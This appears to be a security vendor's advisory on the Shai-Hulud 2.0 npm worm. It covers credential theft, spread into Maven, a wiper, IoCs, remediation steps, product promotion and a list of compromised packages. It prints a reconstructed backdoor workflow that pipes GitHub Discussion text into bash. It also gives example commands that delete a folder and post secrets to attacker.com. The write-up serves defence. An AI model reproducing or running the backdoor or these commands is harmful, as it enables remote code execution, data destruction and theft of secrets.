Shai-Hulud 2.0 NPM Supply Chain Attack

TL;DR

On November 24, 2025, researchers uncovered Shai Hulud: The Second Coming, a new wave of the NPM Supply Chain Attack that reinfects npm packages, steals credentials, and spreads across developer machines and CI/CD pipelines. Unlike the first incident, this version installs the Bun runtime on the fly, deploys hidden GitHub Actions backdoors, and includes a destructive wiper capable of erasing entire home directories on Linux, macOS, and Windows. Within hours, the number of compromised packages surged past 830, confirming that this is not a simple variant but a major escalation of the original worm.

Impact: any developer or CI runner installing public npm packages may have been exposed. Java teams are also at risk after infected packages were automatically mirrored into Maven Central.

Immediate actions: block known malicious versions, enforce lockfile-only installs, rotate npm, GitHub, and cloud credentials, remove unknown self-hosted runners, and monitor for IoCs such as setup_bun.js, bun_environment.js, and suspicious GitHub repositories containing “Sha1-Hulud: The Second Coming”.

What Changed: Shai Hulud in the NPM Supply Chain Attack When It Jumped to Maven

The second wave of the Shai Hulud attack introduced a major escalation. In the first campaign, the worm stayed inside the npm ecosystem. This time, the malware crossed into Maven Central, exposing Java teams that never touched npm.

Timeline and Token Window

The attack started on November 24, 2025, right before npm retired its legacy authentication tokens on December 9.
These old tokens were easier to steal and reuse. Because the attackers still had access to them during this window, they were able to republish hundreds of malicious versions at high speed before the cutoff.

How the Malware Reached Maven

The cross-registry jump happened because of mvnpm, an automated mirroring tool that converts npm packages into Maven artifacts.

mvnpm does not perform security checks. It simply repackages whatever npm publishes.

As a result:

A compromised npm package (for example posthog-node@4.18.1)
Was auto-converted into a Maven artifact
org.mvnpm:posthog-node:4.18.1
And published to Maven Central before anyone realized it was infected.

This means Java developers became victims of an npm breach, even if they never installed an npm package.

Why This Matters

This is the first known cross-registry worm, where a supply chain attack spreads from one ecosystem to another through automation alone.
Because of this, the blast radius now includes Java, JVM workloads, and enterprise build systems that rely on Maven Central.

What Makes Shai Hulud 2.0 So Serious

Bun Runtime Used to Evade Detection

The attackers switched from Node.js to the Bun runtime. The malware installs Bun on-the-fly through setup_bun.js during package installation. This avoids Node-specific monitoring and gives the attackers faster execution for a very large obfuscated payload.

GitHub Actions Used as a Command Backdoor

Once installed, the malware creates a hidden GitHub Actions self-hosted runner in $HOME/.dev-env/. This works on Windows, macOS, and Linux.The attackers can run commands simply by posting messages in GitHub Discussions on a compromised repository. A workflow file processes those messages and executes them as shell commands.

Built-in Wiper

If the malware cannot authenticate with GitHub or npm, it wipes the victim’s home directory.

On Windows it uses del, rd, and cipher /W to wipe files.
On Linux and macOS it overwrites data with shred and then removes directories.

A Very Noisy Campaign

Although the malware employs some stealth (for example, by using Bun), the overall campaign is anything but quiet. It aggressively republishes compromised packages, creates hundreds or thousands of new repositories, uploads credential dumps in bulk, and installs long-lived self-hosted runners on developer machines. None of this is low-profile behavior. The scale, speed, and operational “loudness” of this attack stand out compared to most supply chain compromises, which tend to prioritize remaining unseen for as long as possible.

Wide Impact

The attackers compromised many well-known packages with millions of monthly downloads, including:
Zapier, ENS Domains, Postman, PostHog, AsyncAPI, and Voiceflow.

Possible Attribution Signals

Attribution is difficult here, and there’s no confirmed source behind the campaign. Wiz notes that the operation resembles the earlier Shai-Hulud worm, but the differences in how the payload is built and how the malware spreads point to the possibility of a different set of operators. Their assessment highlights that multiple environments downloaded the compromised packages before npm removed them, which suggests real-world exposure rather than a short-lived test.

Given that the tactics echo the first wave yet diverge in key places, especially in payload structure, propagation logic, and operational “style” a copycat scenario is plausible. The attackers may have borrowed ideas from Shai-Hulud but implemented their own tooling. This could represent another group entirely trying to imitate the earlier campaign.

At this point, there’s no strong evidence tying it to any known actor, financially motivated group, or state-linked entity. The overlap with the original worm is real, but the differences matter enough to keep attribution in the “unconfirmed” category.

Spread Into Maven

Socket Security confirmed that the malicious npm packages were automatically republished to Maven through mvnpm, a tool that converts npm packages into Maven artifacts without manual review.

The following package was pushed to Maven Central: org.mvnpm:posthog-node:4.18.1

Because mvnpm simply repackages whatever npm publishes, the infected versions were mirrored into the Java ecosystem before anyone realized it.

Maven Central removed the affected artifacts on November 25, 2025 and began tightening controls to prevent similar cross-registry issues.

This means Java projects with no direct connection to npm could still have been exposed.

How the Shai Hulud 2.0 Attack Works

Infection Flow

A malicious preinstall script is added to package.json.
setup_bun.js installs Bun on the victim’s machine if missing.
bun_environment.js (more than 480k lines of obfuscated code) runs in the background.
The malware scans for credentials using techniques similar to TruffleHog. It looks for
- AWS, GCP, and Azure keys
- GitHub tokens
- npm tokens
- CI system secrets
Stolen data is uploaded to public GitHub repositories that have the description “Sha1-Hulud: The Second Coming”.
Using captured tokens, the malware publishes compromised versions of packages, infects accessible GitHub repositories, and installs persistent self-hosted runners for remote code execution.

Malicious GitHub Workflows

During the second wave of the Shai-Hulud NPM Supply Chain Attack, the malware created two hidden GitHub Actions workflows inside compromised repositories. These workflows give attackers remote code execution, long-term persistence, and full access to system secrets.

1. Backdoor Workflow (discussion.yaml)

The most dangerous workflow listens to GitHub Discussions events. When a discussion message is created or edited, the workflow reads the message body and executes it as a shell command on the victim’s machine.

Below is a simplified version of the malicious workflow, reconstructed from observed samples:

# .github/workflows/discussion.yaml
name: Discussion Backdoor

on:
  discussion:
    types: [created, edited]

jobs:
  exec:
    runs-on: self-hosted
    steps:
      - name: Execute attacker command
        run: |
          echo "${{ github.event.discussion.body }}" | bash

The critical line is:

${{ github.event.discussion.body }}

This means the attacker can post any command inside a GitHub Discussion, and the self-hosted runner executes it immediately. Because self-hosted runners often have access to internal networks, cloud credentials, and CI secrets, this backdoor gives the attacker full remote code execution during the Shai Hulud NPM Supply Chain Attack.

Command Injection Exploitation

This workflow abuses how GitHub Actions processes expressions. Instead of restricting input to safe strings, it reads raw discussion content and pipes it directly to the shell. As a result, the attacker only needs to post a message like:

rm -rf /important/folder
curl -X POST https://attacker.com --data @secrets.json

Because this behavior appeared repeatedly during the Shai Hulud NPM Supply Chain Attack, it became one of the clearest signals that the malware was using GitHub Actions as a remote command channel.

Self-hosted runners make this worse because they:

run inside company networks
hold cloud or CI/CD credentials
execute with the user’s permissions
do not have GitHub’s sandboxing or isolation

This gives attackers a persistent command channel into internal environments.

Secret and System Collection Workflow

In addition to the backdoor, the malware drops another workflow whose goal is to collect and store sensitive data from the infected system.
These workflows gather:

cloud credentials
environment variables
directory listings
TruffleHog-style secret scans

They store the collected data in files such as:

cloud.json
environment.json
contents.json
truffleSecrets.json

These files are then uploaded to attacker-controlled GitHub repositories labeled “Sha1-Hulud: The Second Coming”, where hundreds or thousands of dumps were observed.

Indicators of Compromise

File	SHA256
setup_bun.js	a3894003ad1d293ba96d77881ccd2071446dc3f65f434669b49b3da92421901a
bun_environment.js	62ee164b9b306250c1172583f138c9614139264f889fa99614903c12755468d0

Other Red Flags

.github/workflows/discussion.yaml
$HOME/.dev-env/ containing unexpected runners
Public GitHub repos created on your account containing “Sha1-Hulud: The Second Coming”

Updated Metrics (as of Nov 26, 2025)

Metric	Count
npm packages compromised	830+
Infected GitHub repositories	28,000+
Secret files uploaded	5,000+
Total secrets collected	11,858
Valid secrets	2,298

*Data from GitGuardian, OX, and Wiz.

Affected packages can also be consulted using the #shai-hulud / #shai-hulud-second-coming tag within OpenSourceMalware.com

What to Do Now: Responding to the Shai Hulud NPM Supply Chain Attack

The Shai Hulud NPM Supply Chain Attack requires fast and structured response. Since this second wave spreads across npm, GitHub, developer machines and even Maven Central, teams should move quickly to detect, contain and fully remediate any exposure. The steps below help you react in the right order and reduce the risk of further compromise.

Detection

Search GitHub for repos with the description “Sha1-Hulud: The Second Coming”.
Look for Bun installation logs during package installs.
Inspect package.json files for unexpected lifecycle scripts, especially preinstall.
Check for $HOME/.dev-env/ on developer or CI systems.
Review GitHub and npm publishing logs for suspicious releases.

Containment

Rotate all credentials: GitHub, npm, cloud, CI secrets, API keys.
Disable and remove unknown self-hosted runners.
Lock down repo creation temporarily.
Remove infected versions from your dependency graph.

Remediation

Clean affected systems.
Review all GitHub Actions workflows for injected files.
Search your CI logs for unusual commands or runs.

Rebuild from known-good package versions.

How Xygeni Helps Stop Attacks Like Shai-Hulud Second Coming

After a campaign as aggressive as Shai-Hulud Second Coming, teams need more than manual checks. They need automated protection that blocks malware before it reaches developers, CI runners, or production systems. This is where Xygeni provides a major advantage.

Malware Early Warning (MEW): Detect threats before they spread

Xygeni’s Early Warning engine scans new and updated open-source packages in real time. It flags suspicious behavior such as:

Obfuscated JavaScript or massive bundled code
Lifecycle scripts that install external runtimes like Bun
Unexpected connections to GitHub, npm or cloud endpoints
Droppers that write into $HOME, .dev-env/ or workflow folders

MEW detected patterns used in both Shai-Hulud waves, which helps teams react before attackers spread the infection further.

Guardrails in CI/CD block malicious packages

Xygeni enforces guardrails that stop unsafe operations automatically:

CI pipelines cannot install packages with hidden preinstall or postinstall scripts
Builds fail when a package tries to create workflows like .github/workflows/discussion.yaml
Pipelines reject dependencies published from untrusted sources or first-seen accounts

This reduces the attack surface dramatically and keeps malware from running inside CI jobs.

Secrets Protection reduces the blast radius

Because Shai-Hulud steals cloud keys, GitHub tokens, npm tokens and CI secrets, protection must focus on credentials too.
Xygeni:

Detects exposed secrets inside code, logs, workflows and environment files
Rotates high-risk credentials automatically
Enforces short-lived tokens to limit long-term compromise

Even if an attacker gains initial access, stolen keys become useless quickly.

Dependency Governance keeps malicious versions out

Shai-Hulud relied on publishing compromised versions at scale. Xygeni stops this by:

Blocking pull requests that introduce known malicious versions
Flagging packages with suspicious publish patterns
Enforcing lockfile integrity to prevent unexpected upgrades

This prevents attackers from sneaking malicious packages into codebases.

Behavioral Detection spots unusual activity

Xygeni continuously monitors pipelines for actions that match attack behavior, including:

New self-hosted runners appearing without approval
Workflows triggered from GitHub Discussions
Packages downloading external runtimes
Repositories created in bulk or publishing unexpectedly

When something suspicious occurs, Xygeni sends real-time alerts and stops the workflow automatically.

Final Notes: Why the Shai Hulud NPM Supply Chain Attack Still Matters

The Shai-Hulud Second Coming incident shows how easily a modern NPM Supply Chain Attack can move across ecosystems. In this case, malware jumped from npm to Maven because automated mirroring tools like mvnpm republished compromised packages without verification. As a result, Java teams were exposed even if they never used npm directly. This makes clear that cross-registry workflows need immediate review and stronger safeguards.

Moreover, the scale and behavior of this campaign reveal how attackers operate today. Instead of staying quiet, they publish hundreds of packages at once, deploy hidden GitHub runners, steal secrets in bulk, and even include a destructive wiper if anything fails. Consequently, manual reviews do not keep up with this level of automation and speed. Teams need continuous, real-time protection at the package, source, and pipeline layers.

Why Continuous Pipeline Security Is Now Essential

Attacks like Shai-Hulud Second Coming will continue to evolve. Therefore, preventing the next wave requires controls that work automatically inside CI/CD, not after the compromise. Modern defense must combine early malware detection, strict dependency validation, policy enforcement, and secret protection so malicious code cannot move through development environments unnoticed.

Xygeni supports this shift by delivering automated guardrails across the entire software supply chain. It identifies suspicious packages before installation, enforces safe dependency versions, blocks unsafe workflows, detects exposed secrets, and alerts on unusual pipeline activity. As a result, teams stay protected even when supply chain attacks spread fast and cross ecosystem boundaries.

List of compromised packages

Package	Version
02-echo	0.0.7
@accordproject/concerto-analysis	3.24.1
@accordproject/concerto-linter	3.24.1
@accordproject/concerto-linter-default-ruleset	3.24.1
@accordproject/concerto-metamodel	3.12.5
@accordproject/concerto-types	3.24.1
@accordproject/markdown-it-cicero	0.16.26
@accordproject/template-engine	2.7.2
@actbase/css-to-react-native-transform	1.0.3
@actbase/native	0.1.32
@actbase/node-server	1.1.19
@actbase/react-absolute	0.8.3
@actbase/react-daum-postcode	1.0.5
@actbase/react-kakaosdk	0.9.27
@actbase/react-native-actionsheet	1.0.3
@actbase/react-native-devtools	0.1.3
@actbase/react-native-fast-image	8.5.13
@actbase/react-native-kakao-channel	1.0.2
@actbase/react-native-kakao-navi	2.0.4
@actbase/react-native-less-transformer	1.0.6
@actbase/react-native-naver-login	1.0.1
@actbase/react-native-simple-video	1.0.13
@actbase/react-native-tiktok	1.1.3
@alexcolls/nuxt-socket.io	0.0.7 , 0.0.8
@alexcolls/nuxt-ux	0.6.2 , 0.6.1
@antstackio/eslint-config-antstack	0.0.3
@antstackio/express-graphql-proxy	0.2.8
@antstackio/graphql-body-parser	0.1.1
@antstackio/json-to-graphql	1.0.3
@antstackio/shelbysam	1.1.7
@aryanhussain/my-angular-lib	0.0.23
@asyncapi/dotnet-rabbitmq-template	1.0.2 , 1.0.1
@asyncapi/edavisualiser	1.2.2 , 1.2.1
@asyncapi/go-watermill-template	0.2.76 , 0.2.77
@asyncapi/java-template	0.3.6 , 0.3.5
@asyncapi/keeper	0.0.3 , 0.0.2
@asyncapi/php-template	0.1.2 , 0.1.1
@asyncapi/python-paho-template	0.2.15 , 0.2.14
@asyncapi/server-api	0.16.25 , 0.16.24
@asyncapi/studio	1.0.3 , 1.0.2
@asyncapi/web-component	2.6.7 , 2.6.6
@browserbasehq/bb9	1.2.21
@browserbasehq/director-ai	1.0.3
@browserbasehq/mcp	2.1.1
@browserbasehq/mcp-server-browserbase	2.4.2
@browserbasehq/sdk-functions	0.0.4
@browserbasehq/stagehand	3.0.4
@browserbasehq/stagehand-docs	1.0.1
@caretive/caret-cli	0.0.2
@clausehq/flows-step-httprequest	0.1.14
@clausehq/flows-step-jsontoxml	0.1.14
@clausehq/flows-step-mqtt	0.1.14
@clausehq/flows-step-sendgridemail	0.1.14
@clausehq/flows-step-taskscreateurl	0.1.14
@commute/bloom	1.0.3
@commute/market-data	1.0.2
@commute/market-data-chartjs	2.3.1
@dev-blinq/ai-qa-logic	1.0.19
@dev-blinq/cucumber-js	1.0.131
@dev-blinq/cucumber_client	1.0.738
@dev-blinq/ui-systems	1.0.93
@ensdomains/address-encoder	1.1.5
@ensdomains/blacklist	1.0.1
@ensdomains/buffer	0.1.2
@ensdomains/ccip-read-cf-worker	0.0.4
@ensdomains/ccip-read-dns-gateway	0.1.1
@ensdomains/ccip-read-router	0.0.7
@ensdomains/ccip-read-worker-viem	0.0.4
@ensdomains/content-hash	3.0.1
@ensdomains/curvearithmetics	1.0.1
@ensdomains/cypress-metamask	1.2.1
@ensdomains/dnsprovejs	0.5.3
@ensdomains/dnssec-oracle-anchors	0.0.2
@ensdomains/dnssecoraclejs	0.2.9
@ensdomains/durin	0.1.2
@ensdomains/durin-middleware	0.0.2
@ensdomains/ens-archived-contracts	0.0.3
@ensdomains/ens-avatar	1.0.4
@ensdomains/ens-contracts	1.6.1
@ensdomains/ens-test-env	1.0.2
@ensdomains/ens-validation	0.1.1
@ensdomains/ensjs	4.0.3
@ensdomains/ensjs-react	0.0.5
@ensdomains/eth-ens-namehash	2.0.16
@ensdomains/hackathon-registrar	1.0.5
@ensdomains/hardhat-chai-matchers-viem	0.1.15
@ensdomains/hardhat-toolbox-viem-extended	0.0.6
@ensdomains/mock	2.1.52
@ensdomains/name-wrapper	1.0.1
@ensdomains/offchain-resolver-contracts	0.2.2
@ensdomains/op-resolver-contracts	0.0.2
@ensdomains/react-ens-address	0.0.32
@ensdomains/renewal	0.0.13
@ensdomains/renewal-widget	0.1.10
@ensdomains/reverse-records	1.0.1
@ensdomains/server-analytics	0.0.2
@ensdomains/solsha1	0.0.4
@ensdomains/subdomain-registrar	0.2.4
@ensdomains/test-utils	1.3.1
@ensdomains/thorin	0.6.51
@ensdomains/ui	3.4.6
@ensdomains/unicode-confusables	0.1.1
@ensdomains/unruggable-gateways	0.0.3
@ensdomains/vite-plugin-i18next-loader	4.0.4
@ensdomains/web3modal	1.10.2
@everreal/react-charts	2.0.1 , 2.0.2
@everreal/validate-esmoduleinterop-imports	1.4.4 , 1.4.5
@everreal/web-analytics	0.0.1 , 0.0.2
@faq-component/core	0.0.4
@faq-component/react	1.0.1
@fishingbooker/browser-sync-plugin	1.0.5
@fishingbooker/react-loader	1.0.7
@fishingbooker/react-pagination	2.0.6
@fishingbooker/react-raty	2.0.1
@fishingbooker/react-swiper	0.1.5
@hapheus/n8n-nodes-pgp	1.5.1
@hover-design/core	0.0.1
@hover-design/react	0.2.1
@ifelsedeveloper/protocol-contracts-svm-idl	0.1.2
@ifings/design-system	4.9.2
@ifings/metatron3	0.1.5
@kvytech/cli	0.0.7
@kvytech/components	0.0.2
@kvytech/habbit-e2e-test	0.0.2
@kvytech/medusa-plugin-announcement	0.0.8
@kvytech/medusa-plugin-management	0.0.5
@kvytech/medusa-plugin-newsletter	0.0.5
@kvytech/medusa-plugin-product-reviews	0.0.9
@kvytech/medusa-plugin-promotion	0.0.2
@kvytech/web	0.0.2
@lessondesk/api-client	9.12.3 , 9.12.2
@lessondesk/babel-preset	1.0.1
@lessondesk/electron-group-api-client	1.0.3
@lessondesk/eslint-config	1.4.2
@lessondesk/material-icons	1.0.3
@lessondesk/react-table-context	2.0.4
@lessondesk/schoolbus	5.2.2 , 5.2.3
@livecms/live-edit	0.0.32
@livecms/nuxt-live-edit	1.9.2
@louisle2/core	1.0.1
@louisle2/cortex-js	0.1.6
@lpdjs/firestore-repo-service	1.0.1
@markvivanco/app-version-checker	1.0.2 , 1.0.1
@ntnx/passport-wso2	0.0.3
@ntnx/t	0.0.101
@orbitgtbelgium/mapbox-gl-draw-cut-polygon-mode	2.0.5
@orbitgtbelgium/mapbox-gl-draw-scale-rotate-mode	1.1.1
@orbitgtbelgium/orbit-components	1.2.9
@orbitgtbelgium/time-slider	1.0.187
@osmanekrem/bmad	1.0.6
@osmanekrem/error-handler	1.2.2
@posthog/agent	1.24.1
@posthog/ai	7.1.2
@posthog/cli	0.5.15
@posthog/clickhouse	1.7.1
@posthog/core	1.5.6
@posthog/hedgehog-mode	0.0.42
@posthog/icons	0.36.1
@posthog/lemon-ui	0.0.1
@posthog/nextjs-config	1.5.1
@posthog/nuxt	1.2.9
@posthog/piscina	3.2.1
@posthog/plugin-contrib	0.0.6
@posthog/react-rrweb-player	1.1.4
@posthog/rrdom	0.0.31
@posthog/rrweb	0.0.31
@posthog/rrweb-player	0.0.31
@posthog/rrweb-record	0.0.31
@posthog/rrweb-replay	0.0.19
@posthog/rrweb-snapshot	0.0.31
@posthog/rrweb-utils	0.0.31
@posthog/siphash	1.1.2
@posthog/wizard	1.18.1
@postman/aether-icons	2.23.4 , 2.23.3 , 2.23.2
@postman/csv-parse	4.0.5 , 4.0.3 , 4.0.4
@postman/node-keytar	7.9.6 , 7.9.4 , 7.9.5
@postman/tunnel-agent	0.6.7 , 0.6.6 , 0.6.5
@pradhumngautam/common-app	1.0.2
@pruthvi21/use-debounce	1.0.3
@quick-start-soft/quick-document-translator	1.4.2511142126
@quick-start-soft/quick-git-clean-markdown	1.4.2511142126
@quick-start-soft/quick-markdown	1.4.2511142126
@quick-start-soft/quick-markdown-compose	1.4.2506300029
@quick-start-soft/quick-markdown-image	1.4.2511142126
@quick-start-soft/quick-markdown-print	1.4.2511142126
@quick-start-soft/quick-markdown-translator	1.4.2509202331
@quick-start-soft/quick-remove-image-background	1.4.2511142126
@quick-start-soft/quick-task-refine	1.4.2511142126
@relyt/claude-context-core	0.1.1
@seezo/sdr-mcp-server	0.0.5
@seung-ju/next	0.0.2
@seung-ju/openapi-generator	0.0.4
@seung-ju/react-hooks	0.0.2
@seung-ju/react-native-action-sheet	0.2.1
@sme-ui/aoma-vevasound-metadata-lib	0.1.3
@strapbuild/react-native-date-time-picker	2.0.4
@strapbuild/react-native-perspective-image-cropper	0.4.15
@strapbuild/react-native-perspective-image-cropper-2	0.4.7
@strapbuild/react-native-perspective-image-cropper-poojan31	0.4.6
@suraj_h/medium-common	1.0.5
@thedelta/eslint-config	1.0.2
@tiaanduplessis/json	2.0.3 , 2.0.2
@tiaanduplessis/react-progressbar	1.0.2 , 1.0.1
@trefox/sleekshop-js	0.1.6
@trigo/atrix	7.0.1
@trigo/atrix-elasticsearch	2.0.1
@trigo/atrix-postgres	1.0.3
@trigo/atrix-pubsub	4.0.3
@trigo/atrix-soap	1.0.2
@trigo/atrix-swagger	3.0.1
@trigo/bool-expressions	4.1.3
@trigo/eslint-config-trigo	3.3.1
@trigo/fsm	3.4.2
@trigo/hapi-auth-signedlink	1.3.1
@trigo/pathfinder-ui-css	0.1.1
@trigo/trigo-hapijs	5.0.1
@trpc-rate-limiter/cloudflare	0.1.4
@trpc-rate-limiter/hono	0.1.4
@varsityvibe/api-client	1.3.36 , 1.3.37
@varsityvibe/utils	5.0.6
@varsityvibe/validation-schemas	0.6.7 , 0.6.8
@vishadtyagi/full-year-calendar	0.1.11
@voiceflow/alexa-types	2.15.60 , 2.15.61
@voiceflow/anthropic	0.4.4 , 0.4.5
@voiceflow/api-sdk	3.28.58 , 3.28.59
@voiceflow/backend-utils	5.0.2 , 5.0.1
@voiceflow/base-types	2.136.3 , 2.136.2
@voiceflow/body-parser	1.21.2 , 1.21.3
@voiceflow/chat-types	2.14.59 , 2.14.58
@voiceflow/circleci-config-sdk-orb-import	0.2.1 , 0.2.2
@voiceflow/commitlint-config	2.6.2 , 2.6.1
@voiceflow/common	8.9.1 , 8.9.2
@voiceflow/default-prompt-wrappers	1.7.4 , 1.7.3
@voiceflow/dependency-cruiser-config	1.8.12 , 1.8.11
@voiceflow/dtos-interact	1.40.2 , 1.40.1
@voiceflow/encryption	0.3.3 , 0.3.2
@voiceflow/eslint-config	7.16.4 , 7.16.5
@voiceflow/eslint-plugin	1.6.2 , 1.6.1
@voiceflow/exception	1.10.2 , 1.10.1
@voiceflow/fetch	1.11.1 , 1.11.2
@voiceflow/general-types	3.2.23 , 3.2.22
@voiceflow/git-branch-check	1.4.4 , 1.4.3
@voiceflow/google-dfes-types	2.17.12 , 2.17.13
@voiceflow/google-types	2.21.12 , 2.21.13
@voiceflow/husky-config	1.3.1 , 1.3.2
@voiceflow/logger	2.4.3 , 2.4.2
@voiceflow/metrics	1.5.2 , 1.5.1
@voiceflow/natural-language-commander	0.5.2 , 0.5.3
@voiceflow/nestjs-common	2.75.2 , 2.75.3
@voiceflow/nestjs-mongodb	1.3.1 , 1.3.2
@voiceflow/nestjs-rate-limit	1.3.3 , 1.3.2
@voiceflow/nestjs-redis	1.3.1 , 1.3.2
@voiceflow/nestjs-timeout	1.3.1 , 1.3.2
@voiceflow/npm-package-json-lint-config	1.1.1 , 1.1.2
@voiceflow/openai	3.2.2 , 3.2.3
@voiceflow/pino	6.11.4 , 6.11.3
@voiceflow/pino-pretty	4.4.2 , 4.4.1
@voiceflow/prettier-config	1.10.2 , 1.10.1
@voiceflow/react-chat	1.65.4 , 1.65.3
@voiceflow/runtime	1.29.1 , 1.29.2
@voiceflow/runtime-client-js	1.17.3 , 1.17.2
@voiceflow/sdk-runtime	1.43.2 , 1.43.1
@voiceflow/secrets-provider	1.9.3 , 1.9.2
@voiceflow/semantic-release-config	1.4.2 , 1.4.1
@voiceflow/serverless-plugin-typescript	2.1.7 , 2.1.8
@voiceflow/slate-serializer	1.7.4 , 1.7.3
@voiceflow/stitches-react	2.3.3 , 2.3.2
@voiceflow/storybook-config	1.2.2 , 1.2.3
@voiceflow/stylelint-config	1.1.1 , 1.1.2
@voiceflow/test-common	2.1.1 , 2.1.2
@voiceflow/tsconfig	1.12.2 , 1.12.1
@voiceflow/tsconfig-paths	1.1.5 , 1.1.4
@voiceflow/utils-designer	1.74.19 , 1.74.20
@voiceflow/verror	1.1.5 , 1.1.4
@voiceflow/vite-config	2.6.2 , 2.6.3
@voiceflow/vitest-config	1.10.3 , 1.10.2
@voiceflow/voice-types	2.10.59 , 2.10.58
@voiceflow/voiceflow-types	3.32.45 , 3.32.46
@voiceflow/widget	1.7.18 , 1.7.19
@zapier/ai-actions	0.1.20 , 0.1.19 , 0.1.18
@zapier/babel-preset-zapier	6.4.2 , 6.4.1 , 6.4.3
@zapier/browserslist-config-zapier	1.0.4 , 1.0.3 , 1.0.5
@zapier/secret-scrubber	1.1.5 , 1.1.4 , 1.1.3
ai-crowl-shield	1.0.7
arc-cli-fc	1.0.1
asyncapi-preview	1.0.2 , 1.0.1
atrix	1.0.1
automation_model	1.0.491
axios-builder	1.2.1
axios-cancelable	1.0.2 , 1.0.1
axios-timed	1.0.2 , 1.0.1
barebones-css	1.1.4 , 1.1.3
benmostyn-frame-print	1.0.1
bestgpiocontroller	1.0.10
bidirectional-adapter	1.2.2 , 1.2.4 , 1.2.5 , 1.2.3
blinqio-executions-cli	1.0.41
blob-to-base64	1.0.3
bun-plugin-httpfile	0.1.1
bytecode-checker-cli	1.0.11 , 1.0.8 , 1.0.9 , 1.0.10
bytes-to-x	1.0.1
calc-loan-interest	1.0.4
capacitor-plugin-apptrackingios	0.0.21
capacitor-plugin-purchase	0.1.1
capacitor-plugin-scgssigninwithgoogle	0.0.5
capacitor-purchase-history	0.0.10
capacitor-voice-recorder-wav	6.0.3
chrome-extension-downloads	0.0.3 , 0.0.4
claude-token-updater	1.0.3
coinmarketcap-api	3.1.3 , 3.1.2
colors-regex	2.0.1
command-irail	0.5.4
compare-obj	1.1.1 , 1.1.2
composite-reducer	1.0.4 , 1.0.3 , 1.0.2 , 1.0.5
count-it-down	1.0.2 , 1.0.1
cpu-instructions	0.0.14
create-director-app	0.1.1
create-glee-app	0.2.3 , 0.2.2
create-hardhat3-app	1.1.4 , 1.1.3 , 1.1.1 , 1.1.2
crypto-addr-codec	0.1.9
css-dedoupe	0.1.2
dashboard-empty-state	1.0.3
designstudiouiux	1.0.1
devstart-cli	1.0.6
dialogflow-es	1.1.4 , 1.1.3 , 1.1.1 , 1.1.2
discord-bot-server	0.1.2
docusaurus-plugin-vanilla-extract	1.0.3
dont-go	1.1.2
dotnet-template	0.0.3 , 0.0.4
drop-events-on-property-plugin	0.0.2
email-deliverability-tester	1.1.1
enforce-branch-name	1.1.3
esbuild-plugin-brotli	0.2.1
esbuild-plugin-eta	0.1.1
esbuild-plugin-httpfile	0.4.1
eslint-config-nitpicky	4.0.1
eslint-config-trigo	22.0.2
eslint-config-zeallat-base	1.0.4
ethereum-ens	0.8.1
evm-checkcode-cli	1.0.15 , 1.0.12 , 1.0.13 , 1.0.14
exact-ticker	0.3.5
expo-audio-session	0.2.1
expressos	1.1.3
fat-fingered	1.0.2 , 1.0.1
feature-flip	1.0.2 , 1.0.1
firestore-search-engine	1.2.3
fittxt	1.0.3 , 1.0.2
flapstacks	1.0.2 , 1.0.1
flatten-unflatten	1.0.2 , 1.0.1
formik-error-focus	2.0.1
formik-store	1.0.1
fuzzy-finder	1.0.5 , 1.0.6
gate-evm-check-code2	2.0.3 , 2.0.4 , 2.0.5 , 2.0.6
gate-evm-tools-test	1.0.7 , 1.0.8 , 1.0.5 , 1.0.6
gatsby-plugin-cname	1.0.2 , 1.0.1
generator-meteor-stock	0.1.6
generator-ng-itobuz	0.0.15
get-them-args	1.3.3
github-action-for-generator	2.1.28 , 2.1.27
gitsafe	1.0.5
go-template	0.1.8 , 0.1.9
gulp-inject-envs	1.2.2 , 1.2.1
haufe-axera-api-client	0.0.1 , 0.0.2
hope-mapboxdraw	0.1.1
hopedraw	1.0.3
hover-design-prototype	0.0.5
httpness	1.0.3 , 1.0.2
hyper-fullfacing	1.0.3
hyperterm-hipster	1.0.7
ids-css	1.5.1
ids-enterprise-mcp-server	0.0.2
ids-enterprise-ng	20.1.6
ids-enterprise-typings	20.1.6
image-to-uri	1.0.2 , 1.0.1
insomnia-plugin-random-pick	1.0.4
invo	0.2.2
iron-shield-miniapp	0.0.2
ito-button	8.0.3
itobuz-angular	0.0.1
itobuz-angular-auth	8.0.11
itobuz-angular-button	8.0.11
jacob-zuma	1.0.2 , 1.0.1
jaetut-varit-test	1.0.2
jan-browser	0.13.1
jquery-bindings	1.1.3 , 1.1.2
jsonsurge	1.0.7
just-toasty	1.7.1
kill-port	2.0.3 , 2.0.2
korea-administrative-area-geo-json-util	1.0.7
kwami	1.5.9 , 1.5.10
lang-codes	1.0.2 , 1.0.1
license-o-matic	1.2.2 , 1.2.1
lint-staged-imagemin	1.3.1 , 1.3.2
lite-serper-mcp-server	0.2.2
luno-api	1.2.3
manual-billing-system-miniapp-api	1.3.1
medusa-plugin-announcement	0.0.3
medusa-plugin-logs	0.0.17
medusa-plugin-momo	0.0.68
medusa-plugin-product-reviews-kvy	0.0.4
medusa-plugin-zalopay	0.0.40
mod10-check-digit	1.0.1
mon-package-react-typescript	1.0.1
my-saeed-lib	0.1.1
n8n-nodes-tmdb	0.5.1
n8n-nodes-vercel-ai-sdk	0.1.7
n8n-nodes-viral-app	0.2.5
nanoreset	7.0.2 , 7.0.1
next-circular-dependency	1.0.3 , 1.0.2
next-simple-google-analytics	1.1.1 , 1.1.2
next-styled-nprogress	1.0.4 , 1.0.5
ngx-useful-swiper-prosenjit	9.0.2
ngx-wooapi	12.0.1
normal-store	1.3.1 , 1.3.4 , 1.3.3 , 1.3.2
obj-to-css	1.0.3 , 1.0.2
okta-react-router-6	5.0.1
open2internet	0.1.1
orbit-boxicons	2.1.3
orbit-nebula-draw-tools	1.0.10
orbit-nebula-editor	1.0.2
orbit-soap	0.43.13
orchestrix	12.1.2
package-tester	1.0.1
parcel-plugin-asset-copier	1.1.3 , 1.1.2
pdf-annotation	0.0.2
piclite	1.0.1
pico-uid	1.0.4 , 1.0.3
pkg-readme	1.1.1
poper-react-sdk	0.1.2
posthog-docusaurus	2.0.6
posthog-js	1.297.3
posthog-node	4.18.1 , 5.13.3 , 5.11.3
posthog-plugin-hello-world	1.0.1
posthog-react-native	4.11.1 , 4.12.5
posthog-react-native-session-replay	1.2.2
prime-one-table	0.0.19
prompt-eng	1.0.50
puny-req	1.0.3
ra-auth-firebase	1.0.3
ra-data-firebase	1.0.8 , 1.0.7
react-component-taggers	0.1.9
react-data-to-export	1.0.1
react-element-prompt-inspector	0.1.18
react-favic	1.0.2
react-hook-form-persist	3.0.2 , 3.0.1
react-jam-icons	1.0.2 , 1.0.1
react-keycloak-context	1.0.8 , 1.0.9
react-library-setup	0.0.6
